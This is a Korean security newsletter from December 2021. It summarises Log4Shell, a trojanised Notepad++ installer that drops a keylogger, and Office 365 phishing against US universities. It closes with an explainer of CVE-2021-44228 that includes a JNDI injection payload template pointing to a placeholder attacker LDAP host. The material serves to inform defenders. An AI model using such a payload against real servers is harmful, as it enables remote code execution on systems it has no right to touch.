💌 전 세계 보안담당자 주말 출근하게 만든 취약점

안녕하세요! 다음주가 벌써 크리스마스에요. 🎄 저희 해킹짹짹은 다음 주 월요일(20일) 주간뉴스 이후에 휴식을 가지

2021. 12. 12.

12월 3주차 해킹짹짹 뉴스레터 💌

안녕하세요! 다음주가 벌써 크리스마스에요. 🎄 저희 해킹짹짹은 다음 주 월요일(20일) 주간뉴스 이후에 2주간 휴식을 가지며 내년 계획을 세울 생각입니다! 1월 첫째주에 다시 찾아올게요. 🥺

올해의 마지막 해킹 알려줄게는 SQL Injection입니다. 그리고 지난 해킹 알려줄게인 OTP에서 앨리스와 밥이 등장했는데, 이번 해커의 TMI는 앨리스와 밥, 이 친구들에 대해서 얘기해보는 시간을 가져보도록 할게요. 기대해주세요! 😆

주간뉴스

지난 주에는 어떤 일들이 있었을까? 😏

전 세계 서버를 공격 가능한 최악의 log4j 취약점(log4shell) 🖥️

log4j는 Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter 및 Minecraft와 같은 비디오 게임을 비롯한 여러 업체에서 널리 사용되며, 오류 메시지 등을 기록하기 위해 수백만 개의 Java 응용 프로그램에서 사용하는 로깅 라이브러리입니다.

Log4j 2.0-beta9 버전 2.14까지 영향을 미치는 모든 애플리케이션에서 원격 코드 실행 취약점(Log4Shell, CVE-2021-44228)이 발견되어 전 세계 보안 업계가 급하게 조치를 취하고 있어요. Minecraft에서 간단한 메시지를 채팅으로 치기만 하면 서버에서 원격 코드를 실행할 수 있다고 하네요. 😦

발견된 취약점은 Log4j 2의 JNDI(Java Naming and Directory Interface) 인젝션 취약점으로, 자세한 정보는 아래의 하루한줄을 참고해주세요!

키로거 악성코드가 숨어있는 악성 Notepad++ 설치 프로그램 🗒️

Notepad++는 윈도우용 인기 있는 무료 텍스트 및 소스코드 편집기로, StrongPity 해킹 그룹이 키로거 악성코드가 포함된 악성 Notepad++ 설치 프로그램을 배포하고 있습니다.

해당 프로그램을 실행할 경우, Notepad++는 정상적으로 설치되어 피해자는 악성코드가 숨어있다고 생각하기 힘들어요. 하지만, 추가로 ntuis32.exe과 winpickr.exe도 설치됩니다. 🤨

ntuis32.exe는 악성 키로거로 사용자의 모든 키 입력을 저장하고 시스템에서 파일 및 기타 데이터를 훔칠 수 있으며, winpickr.exe는 C2 연결을 설정하여 훔친 데이터를 해커에게 전송한다고 해요. 😈

Office 365 피싱 공격의 표적이 된 미국 대학 🏫

미국의 대학 로그인 포털을 사칭하여 Office 365 계정을 훔치도록 설계된 여러 피싱 공격이 드러났습니다.

피싱 공격은 새로운 오미크론 변종, COVID-19 테스트 결과, 추가 테스트 요구 사항 또는 클래스 변경에 대한 정보를 제목으로 첨부된 htm파일을 클릭하도록 합니다. 그러면 해커가 만든 해당 대학의 로그인 포털 페이지로 이동하는 거죠. 심지어 MFA(Multi-Factor Authentication)를 우회하기 위하여 피해자의 휴대전화에 전송된 OTP를 입력하도록 해 계정을 탈취한다고 해요.

Office 365의 계정이 탈취당하면 전자 메일 계정에 액세스하고 다른 사용자에게 메시지를 보낼 뿐 아니라 OneDrive 및 SharePoint에 저장된 정보에도 액세스할 수 있기 때문에 더욱 조심해야겠네요. 🥺

by y00n_nms

하루한줄

해키보이즈팀이 연구하고 분석하는 최신 해킹 기술👇

CVE-2021-44228: log4shell-전 세계 서버를 공격 가능한 최악의 log4j 취약점

[대상]

Apache Log4j 2.x <= 2.15.0-rc1

[설명]

log4j는 전 세계적으로 인기있는 logging library로 Mincraft, Apple iCloud, Apache, Twitter, Steam, Amazon, Tesla 등 현재 수많은 소프트웨어에서 사용되고 있습니다. 이러한 log4j에서 원격 코드 실행이 가능한 JNDI Injection 취약점이 발견되었습니다.

해당 취약점의 이름은 log4shell로 명명되었으며 log4j를 사용하는 소프트웨어 대부분을 공격 가능한 높은 파급력과 비교적 간단하다는 점 때문에 취약점의 위험성을 평가하는 지표인 cvss 점수의 최고점 10.0이 부여되었습니다. log4shell 취약점의 영향을 받는 소프트웨어는 링크에서 확인할 수 있으며, 2021/12/12 기준 지속적으로 업데이트되고 있습니다.

취약점은 JndiManager.java 의 JNDI lookup 기능에서 발견되었습니다.

JNDI(Java Naming and Directory Interface)는 자바 애플리케이션에서 외부 디렉터리 서비스에 접근하기 위한 API로, 원격지 서버의 객체를 바인딩해 애플리케이션에서 접근할 수 있는 기능입니다. 이러한 외부 디렉터리 서비스 프로토콜은 대표적으로 LDAP(Lightweight Directory Access Protocol)과 LDAPS(Secure LDAP)이 있습니다.

해당 lookup 기능의 name 매개변수에 ${jndi:ldap://[attacker site]/malicious_class} 와 같이 해커가 제어하는 서버의 악성 클래스 경로를 전달하게 되면 lookup은 ${} 안의 내용을 파싱해 실행합니다. 이때 JNDI:LDAP 프로토콜로 접근하는 외부 디렉터리 서비스에 대한 검증이 존재하지 않아 해커의 악성 클래스를 바인딩하게 되고 악성 클래스에 포함된 임의 코드를 원격에서 실행할 수 있습니다.